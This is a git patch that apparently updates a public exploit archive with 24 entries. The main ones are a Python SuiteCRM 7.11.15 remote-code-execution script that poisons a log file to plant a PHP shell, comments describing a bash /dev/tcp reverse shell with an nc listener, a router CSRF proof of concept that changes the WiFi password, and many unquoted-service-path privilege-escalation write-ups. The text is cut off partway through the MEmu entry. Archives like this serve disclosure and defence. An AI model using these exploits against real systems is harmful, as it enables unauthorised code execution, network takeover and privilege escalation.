From e797f5230dbf13c5cceccd6dd93441f01500ad41 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 10 Nov 2020 05:02:05 +0000 Subject: [PATCH] DB: 2020-11-10 24 changes to exploits/shellcodes HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE' - Unquoted Service Path Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path DiskBoss v11.7.28 - Multiple Services Unquoted Service Path Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated) Joplin 1.2.6 - 'link' Cross Site Scripting --- exploits/hardware/webapps/49000.txt | 90 ++++++++++++++++++++++ exploits/multiple/webapps/49024.txt | 23 ++++++ exploits/php/webapps/49001.py | 113 ++++++++++++++++++++++++++++ exploits/windows/local/49002.txt | 39 ++++++++++ exploits/windows/local/49003.txt | 24 ++++++ exploits/windows/local/49004.txt | 24 ++++++ exploits/windows/local/49005.txt | 39 ++++++++++ exploits/windows/local/49006.txt | 27 +++++++ exploits/windows/local/49007.txt | 27 +++++++ exploits/windows/local/49008.txt | 25 ++++++ exploits/windows/local/49009.txt | 38 ++++++++++ exploits/windows/local/49010.txt | 40 ++++++++++ exploits/windows/local/49011.txt | 48 ++++++++++++ exploits/windows/local/49012.txt | 44 +++++++++++ exploits/windows/local/49013.txt | 40 ++++++++++ exploits/windows/local/49014.txt | 34 +++++++++ exploits/windows/local/49016.txt | 24 ++++++ exploits/windows/local/49017.txt | 26 +++++++ exploits/windows/local/49018.txt | 30 ++++++++ exploits/windows/local/49019.txt | 35 +++++++++ exploits/windows/local/49020.txt | 37 +++++++++ exploits/windows/local/49021.txt | 32 ++++++++ exploits/windows/local/49022.txt | 101 +++++++++++++++++++++++++ exploits/windows/local/49023.txt | 28 +++++++ files_exploits.csv | 24 ++++++ 25 files changed, 1012 insertions(+) create mode 100644 exploits/hardware/webapps/49000.txt create mode 100644 exploits/multiple/webapps/49024.txt create mode 100755 exploits/php/webapps/49001.py create mode 100644 exploits/windows/local/49002.txt create mode 100644 exploits/windows/local/49003.txt create mode 100644 exploits/windows/local/49004.txt create mode 100644 exploits/windows/local/49005.txt create mode 100644 exploits/windows/local/49006.txt create mode 100644 exploits/windows/local/49007.txt create mode 100644 exploits/windows/local/49008.txt create mode 100644 exploits/windows/local/49009.txt create mode 100644 exploits/windows/local/49010.txt create mode 100644 exploits/windows/local/49011.txt create mode 100644 exploits/windows/local/49012.txt create mode 100644 exploits/windows/local/49013.txt create mode 100644 exploits/windows/local/49014.txt create mode 100644 exploits/windows/local/49016.txt create mode 100644 exploits/windows/local/49017.txt create mode 100644 exploits/windows/local/49018.txt create mode 100644 exploits/windows/local/49019.txt create mode 100644 exploits/windows/local/49020.txt create mode 100644 exploits/windows/local/49021.txt create mode 100644 exploits/windows/local/49022.txt create mode 100644 exploits/windows/local/49023.txt diff --git a/exploits/hardware/webapps/49000.txt b/exploits/hardware/webapps/49000.txt new file mode 100644 index 000000000..e089dbc4e --- /dev/null +++ b/exploits/hardware/webapps/49000.txt @@ -0,0 +1,90 @@ +# Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF +# Date: 28-08-2020 +# Vendor Homepage: https://www.gxgroup.eu/ont-products/ +# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec) +# Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/ +# Version: v2.1 (software version P4410-V2-1.28) +# CVE : CVE-2020-25015 + +1. Description + +Platinum 4410 is a compact router from Genexis that is commonly used at homes and offices. Hardware version V2.1 – Software version P4410-V2-1.28 was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password. + +2. Impact + +An attacker can send the victim a link, which if he clicks while he is connected to the WiFi network established from the vulnerable router, the password of the WIFI access point will get changed via CSRF exploit. As the router is also vulnerable to Broken Access Control, the victim does not need to be logged in to the router’s web-based setup page (192.168.1.1), essentially making this a one-click hack. + +3. Proof of Concept + +Create an HTML file with the following code: + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + +Open this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD + + +4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title + +3. Timeline + +Vulnerability reported to the Genexis team – August 28, 2020 +Team confirmed firmware release containing fix – September 14, 2020 \ No newline at end of file diff --git a/exploits/multiple/webapps/49024.txt b/exploits/multiple/webapps/49024.txt new file mode 100644 index 000000000..6a3cde830 --- /dev/null +++ b/exploits/multiple/webapps/49024.txt @@ -0,0 +1,23 @@ +# Exploit Title: Joplin 1.2.6 - 'link' Cross Site Scripting +# Date: 2020-09-21 +# Exploit Author: Philip Holbrook (@fhlipZero) +# Vendor Homepage: https://joplinapp.org/ +# Software Link: https://github.com/laurent22/joplin/releases/tag/v1.2.6 +# Version: 1.2.6 +# Tested on: Windows / Mac +# CVE : CVE-2020-28249 +# References: +# https://github.com/fhlip0/JopinXSS/blob/main/readme.md + +# 1. Technical Details +# An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to +bypass the HTML filter + +# 2. PoC +# Paste the following payload into a note: + +``` + +``` \ No newline at end of file diff --git a/exploits/php/webapps/49001.py b/exploits/php/webapps/49001.py new file mode 100755 index 000000000..468ff3595 --- /dev/null +++ b/exploits/php/webapps/49001.py @@ -0,0 +1,113 @@ +# Exploit Title: SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated) +# Date: 08 NOV 2020 +# Exploit Author: M. Cory Billington (@_th3y) +# Vendor Homepage: https://suitecrm.com/ +# Software Link: https://github.com/salesagility/SuiteCRM +# Version: 7.11.15 and below +# Tested on: Ubuntu 20.04 LTS +# CVE: CVE-2020-28328 +# Writeup: https://github.com/mcorybillington/SuiteCRM-RCE + +from requests import Session +from random import choice +from string import ascii_lowercase + +url = "http://127.0.0.1/" # URL to remote host web root +post_url = "{url}index.php".format(url=url) +user_name = "admin" # User must be an administrator +password = "admin" +prefix = 'shell-' +file_name = '{prefix}{rand}.php'.format( + prefix=prefix, + rand=''.join(choice(ascii_lowercase) for _ in range(6)) +) + +# *Recommend K.I.S.S as some characters are escaped* +# Example for reverse shell: +# Put 'bash -c '(bash -i >& /dev/tcp/127.0.0.1/8080 0>&1)&' inside a file named shell.sh +# Stand up a python web server `python -m http.server 80` hosting shell.sh +# Set a nc listener to catch the shell 'nc -nlvp 8080' +command = ''.format(fname=file_name) + +# Admin login payload +login_data = { + "module": "Users", + "action": "Authenticate", + "return_module": "Users", + "return_action": "Login", + "user_name": user_name, + "username_password": password, + "Login": "Log+In" +} + +# Payload to set logging to 'info' and create a log file in php format. +modify_system_settings_data = { + "action": (None, "SaveConfig"), + "module": (None, "Configurator"), + "logger_file_name": (None, file_name), # Set file extension in the file name as it isn't checked here + "logger_file_ext": (None, ''), # Bypasses file extension check by just not setting one. + "logger_level": (None, "info"), # This is important for your php code to make it into the logs + "save": (None, "Save") +} + +# Payload to put php code into the malicious log file +poison_log = { + "module": (None, "Users"), + "record": (None, "1"), + "action": (None, "Save"), + "page": (None, "EditView"), + "return_action": (None, "DetailView"), + "user_name": (None, user_name), + "last_name": (None, command), +} + +# Payload to restore the log file settings to default after the exploit runs +restore_log = { + "action": (None, "SaveConfig"), + "module": (None, "Configurator"), + "logger_file_name": (None, "suitecrm"), # Default log file name + "logger_file_ext": (None, ".log"), # Default log file extension + "logger_level": (None, "fatal"), # Default log file setting + "save": (None, "Save") +} + +# Start of exploit +with Session() as s: + + # Authenticating as the administrator + s.get(post_url, params={'module': 'Users', 'action': 'Login'}) + print('[+] Got initial PHPSESSID:', s.cookies.get_dict()['PHPSESSID']) + s.post(post_url, data=login_data) + if 'ck_login_id_20' not in s.cookies.get_dict().keys(): + print('[-] Invalid password for: {user}'.format(user=user_name)) + exit(1) + print('[+] Authenticated as: {user}. PHPSESSID: {cookie}'.format( + user=user_name, + cookie=s.cookies.get_dict()['PHPSESSID']) + ) + + # Modify the system settings to set logging to 'info' and create a log file in php format + print('[+] Modifying log level and log file name.') + print('[+] File name will be: {fname}'.format(fname=file_name)) + settings_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)} + s.post(post_url, headers=settings_header, files=modify_system_settings_data) + + # Post to update the administrator's last name with php code that will poison the log file + print('[+] Poisoning log file with php code: {cmd}'.format(cmd=command)) + command_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)} + s.post(url, headers=command_header, files=poison_log) + + # May be a good idea to put a short delay in here to allow your code to make it into the logfile. + # Up to you though... + + # Do a get request to trigger php code execution. + print('[+] Executing code. Sending GET request to: {url}{fname}'.format(url=url, fname=file_name)) + execute_command = s.get('{url}/{fname}'.format(url=url, fname=file_name), timeout=1) + if not execute_command.ok: + print('[-] Exploit failed, sorry... Might have to do some modifications.') + + # Restoring log file to default + print('[+] Setting log back to defaults') + s.post(post_url, headers=settings_header, files=restore_log) + +print('[+] Done. Clean up {fname} if you care...'.format(fname=file_name)) \ No newline at end of file diff --git a/exploits/windows/local/49002.txt b/exploits/windows/local/49002.txt new file mode 100644 index 000000000..0b9717b3a --- /dev/null +++ b/exploits/windows/local/49002.txt @@ -0,0 +1,39 @@ +# Exploit Title: HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path +# Date: 2020-11-08 +# Exploit Author: Julio Aviña +# Vendor Homepage: https://www.portrait.com/ +# Software Link: https://www.portrait.com/dtune/hwp/enu/ +# Software Version: 3.20 +# File Version: 1.0.0.1 +# Tested on: Windows 10 Pro x64 es +# Vulnerability Type: Unquoted Service Path + + +# 1. To find the unquoted service path vulnerability + +C:\>wmic service where 'name like "%DTSRVC%"' get name, displayname, pathname, startmode, startname + +DisplayName Name PathName StartMode StartName +Portrait Displays Display Tune Service DTSRVC C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe Auto LocalSystem + +# 2. To check service info: + +C:\>sc qc "DTSRVC" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: DTSRVC + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Portrait Displays Display Tune Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + + +# 3. Exploit: + +A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application. +When restarting the service or the system, the inserted executable will run with elevated privileges. \ No newline at end of file diff --git a/exploits/windows/local/49003.txt b/exploits/windows/local/49003.txt new file mode 100644 index 000000000..4a9ebbf67 --- /dev/null +++ b/exploits/windows/local/49003.txt @@ -0,0 +1,24 @@ +#Exploit Title: KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path +#Exploit Author : SamAlucard +#Exploit Date: 2020-11-08 +#Vendor : KMSpico +#Version : Service_KMS 17.1.0.0 +#Vendor Homepage : https://official-kmspico.com/ +#Tested on OS: Windows 7 Pro + +#Analyze PoC : +============== + +C:\>sc qc "Service KMSELDI" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Service KMSELDI + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\KMSpico\Service_KMS.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Service KMSELDI + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/49004.txt b/exploits/windows/local/49004.txt new file mode 100644 index 000000000..327f5e57f --- /dev/null +++ b/exploits/windows/local/49004.txt @@ -0,0 +1,24 @@ +#Exploit Title: Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path +#Exploit Author : SamAlucard +#Exploit Date: 2020-11-08 +#Vendor : Winstep +#Version : WsxService 18.06.0096 +#Vendor Homepage : https://www.winstep.net/xtreme.asp +#Tested on OS: Windows 7 Pro + +#Analyze PoC : +============== + +C:\>sc qc "Winstep Xtreme Service" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Winstep Xtreme Service + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\Winstep\WsxService + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Winstep Xtreme Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/49005.txt b/exploits/windows/local/49005.txt new file mode 100644 index 000000000..01fbde709 --- /dev/null +++ b/exploits/windows/local/49005.txt @@ -0,0 +1,39 @@ +# Exploit Title: OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path +# Date: 2020-11-08 +# Exploit Author: Julio Aviña +# Vendor Homepage: https://www.oki.com/ +# Software Link: https://www.oki.com/mx/printing/download/sPSV_010041_2_270910.exe +# Software Version: 1.0.41 +# File Version: 1.4.2.0 +# Tested on: Windows 10 Pro x64 es +# Vulnerability Type: Unquoted Service Path + + +# 1. To find the unquoted service path vulnerability + +C:\>wmic service where 'name like "%sPSVOpLclSrv%"' get displayname, pathname, startmode, startname + +DisplayName PathName StartMode StartName +OKI sPSV Port Manager C:\Program Files\Okidata\smart PrintSuperVision\xml\ComApi\extend3\portmgrsrv.exe Auto LocalSystem + +# 2. To check service info: + +C:\>sc qc "sPSVOpLclSrv" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: sPSVOpLclSrv + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\Okidata\smart PrintSuperVision\xml\ComApi\extend3\portmgrsrv.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : OKI sPSV Port Manager + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + + +# 3. Exploit: + +A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application. +When restarting the service or the system, the inserted executable will run with elevated privileges. \ No newline at end of file diff --git a/exploits/windows/local/49006.txt b/exploits/windows/local/49006.txt new file mode 100644 index 000000000..bb4b1a848 --- /dev/null +++ b/exploits/windows/local/49006.txt @@ -0,0 +1,27 @@ +#Exploit Title: IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path +#Exploit Author : SamAlucard +#Exploit Date: 2020-11-08 +#Vendor : HTC +#Version : IPTInstaller 4.0.9 +#Vendor Homepage : https://www.htc.com/latam/ +#Tested on OS: Windows 7 Pro + +#Analyze PoC : +============== + +C:\Users\DSAZ230>sc qc "PassThru Service" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: PassThru Service + TIPO : 10 +[image: PassThruserv.jpg] + WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\HTC\Internet +Pass-Through\PassThruSvr.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Internet Pass-Through Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/49007.txt b/exploits/windows/local/49007.txt new file mode 100644 index 000000000..182685331 --- /dev/null +++ b/exploits/windows/local/49007.txt @@ -0,0 +1,27 @@ +#Exploit Title: Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path +Service Path +#Exploit Author : SamAlucard +#Exploit Date: 2020-11-08 +#Vendor : Genexus +#Version : Genexus Protection Server 9.6.4.2 +#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;; +#Vendor Homepage : https://www.genexus.com/es/ +#Tested on OS: Windows 10 Pro + +#Analyze PoC : +============== + +C:\>sc qc protsrvservice +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: protsrvservice + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Common +Files\Artech\GXProt1\ProtSrv.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : ProtSrvService + DEPENDENCIAS : RPCSS + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/49008.txt b/exploits/windows/local/49008.txt new file mode 100644 index 000000000..42977762a --- /dev/null +++ b/exploits/windows/local/49008.txt @@ -0,0 +1,25 @@ +#Exploit Title: DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path +#Exploit Author : SamAlucard +#Exploit Date: 2020-11-08 +#Vendor : DigitalPersona U. are U. One Touch +#Version : DigitalPersona Pro 4.5.0.2213 +#Vendor Homepage : https://www.hidglobal.com/crossmatch +#Tested on OS: Windows 10 Home + +#Analyze PoC : +============== + +C:\>sc qc DpHost +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: DpHost + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files +(x86)\DigitalPersona\Bin\DpHostW.exe + GRUPO_ORDEN_CARGA : BiometricGroup + ETIQUETA : 0 + NOMBRE_MOSTRAR : Servicio de autenticación biométrica + DEPENDENCIAS : RPCSS + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/49009.txt b/exploits/windows/local/49009.txt new file mode 100644 index 000000000..180cfd38e --- /dev/null +++ b/exploits/windows/local/49009.txt @@ -0,0 +1,38 @@ +# Exploit Title: Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path +# Date: 2020-11-08 +# Exploit Author: Julio Aviña +# Vendor Homepage: https://www.syncplify.me/ +# Software Link: https://download.syncplify.me/SMServer_Setup.exe +# Version: 5.0.37 +# Tested on: Windows 10 Pro x64 es +# Vulnerability Type: Unquoted Service Path + + +# 1. To find the unquoted service path vulnerability + +C:\>wmic service where 'name like "%SMWebRestServicev5%"' get displayname, pathname, startmode, startname + +DisplayName PathName StartMode StartName +Syncplify.me Web/REST Server! v5 C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe Auto LocalSystem + +# 2. To check service info: + +C:\>sc qc "SMWebRestServicev5" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: SMWebRestServicev5 + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Syncplify.me Web/REST Server! v5 + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + + +# 3. Exploit: + +A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application. +When restarting the service or the system, the inserted executable will run with elevated privileges. \ No newline at end of file diff --git a/exploits/windows/local/49010.txt b/exploits/windows/local/49010.txt new file mode 100644 index 000000000..03f2274d2 --- /dev/null +++ b/exploits/windows/local/49010.txt @@ -0,0 +1,40 @@ +#Exploit Title: HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path +#Discovery by: Jocelyn Arenas +#Discovery Date: 2020-11-07 +#Vendor Homepage: https://www8.hp.com/mx/es/home.html +#Tested Version: 1.4.8.0 +#Vulnerability Type: Unquoted Service Path +#Tested on OS: Windows 10 Home x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """ + + +HPWMISVC HPWMISVC c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe Auto + + +#Service info: + +C:\>sc qc HPWMISVC +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME : HPWMISVC + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : HPWMISVC + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + + + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security +applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with +the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/49011.txt b/exploits/windows/local/49011.txt new file mode 100644 index 000000000..8000668fb --- /dev/null +++ b/exploits/windows/local/49011.txt @@ -0,0 +1,48 @@ +# Exploit Title: Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path +# Discovery by: Angel Canseco +# Discovery Date: 2020-11-08 +# Vendor Homepage: https://www.filehorse.com/es/descargar-motorola-device-manager/ +# Tested Version: 2.4.5 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr /i +"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "PST Service " | +findstr /i /v """ + + +Motorola Device Manager C:\Program Files (x86)\Motorola Mobility\Motorola +Device Manager\MotoHelperService.exe +Auto + + # Service info: + +PST Service C:\Program Files +(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe + + Auto + + +C:\>sc qc "PST Service" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: PST Service + TIPO : 110 WIN32_OWN_PROCESS (interactive) + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files +(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : PST Service + DEPENDENCIAS : lanmanworkstation + NOMBRE_INICIO_SERVICIO: LocalSystem + +#Exploit: + +A successful attempt would cause the local user to be able to insert their +code in the system root path +undetected by the OS or other security applications and elevate his +privileges after reboot. \ No newline at end of file diff --git a/exploits/windows/local/49012.txt b/exploits/windows/local/49012.txt new file mode 100644 index 000000000..d1f46a872 --- /dev/null +++ b/exploits/windows/local/49012.txt @@ -0,0 +1,44 @@ +# Exploit Title: Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path +# Discovery by: Angel Canseco +# Discovery Date: 2020-11-07 +# Vendor Homepage: https://motorola-device-manager.programas-gratis.net/descarga-completada +# Tested Version: 2.5.4 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr /i +"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "MotoHelperService " | +findstr /i /v """ + +Motorola Device Manager Service + +Motorola Device Manager C:\Program Files (x86)\Motorola Mobility\Motorola +Device Manager\MotoHelperService.exe +Auto + + +# Service info: + +C:\>sc qc "Motorola Device Manager" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Motorola Device Manager + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Motorola +Mobility\Motorola Device Manager\MotoHelperService.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Motorola Device Manager Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +#Exploit: + +A successful attempt would cause the local user to be able to insert their +code in the system root path +undetected by the OS or other security applications and elevate his +privileges after reboot. \ No newline at end of file diff --git a/exploits/windows/local/49013.txt b/exploits/windows/local/49013.txt new file mode 100644 index 000000000..e905a08e8 --- /dev/null +++ b/exploits/windows/local/49013.txt @@ -0,0 +1,40 @@ +# Exploit Title: Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe 'Unquoted Service Path +# Discovery by: Angel Canseco +# Discovery Date: 2020-11-07 +# Vendor Homepage: https://motorola-device-manager.programas-gratis.net/gracias +# Tested Version: 2.5.4 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr /i +"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ForwardDaemon" | +findstr /i /v """ + + +PST Service C:\Program Files +(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe +Auto + +C:\Users\MISTI>sc qc "PST Service" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: PST Service + TIPO : 110 WIN32_OWN_PROCESS (interactive) + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files +(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : PST Service + DEPENDENCIAS : lanmanworkstation + NOMBRE_INICIO_SERVICIO: LocalSystem + +#Exploit: + +A successful attempt would cause the local user to be able to insert their +code in the system root path +undetected by the OS or other security applications and elevate his +privileges after reboot. \ No newline at end of file diff --git a/exploits/windows/local/49014.txt b/exploits/windows/local/49014.txt new file mode 100644 index 000000000..239950c5e --- /dev/null +++ b/exploits/windows/local/49014.txt @@ -0,0 +1,34 @@ +# Exploit Title: Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path +# Discovery by: Erika Figueroa +# Discovery Date: 2020-11-07 +# Vendor Homepage: https://www.realtek.com/en/ +# Tested Version: 1.0.64.10 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 8.1 x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """ + +Andrea RT Filters Service AERTFilters C:\Program Files\Realtek\Audio\HDA\AERTSr64.EXE Auto + +# Service info: + +C:\>sc qc "AERTFilters" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: AERTFilters + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\Realtek\Audio\HDA\AERTSr64.EXE + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Andrea RT Filters Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/49016.txt b/exploits/windows/local/49016.txt new file mode 100644 index 000000000..f1053e7ce --- /dev/null +++ b/exploits/windows/local/49016.txt @@ -0,0 +1,24 @@ +#Exploit Title: MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path +#Exploit Author : SamAlucard +#Exploit Date: 2020-11-07 +#Vendor : Microvirt +#Version : Microvirt MEMU 3.7.0 +#Vendor Homepage : https://www.memuplay.com/ +#Tested on OS: Windows 10 Home + +#Analyze PoC : +============== + +C:\Users\Sam Sanz>sc qc "MEmusvc" +[SC] QueryServiceConfig CORRECTO + + NOMBRE_SERVICIO: MEmusvc + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START 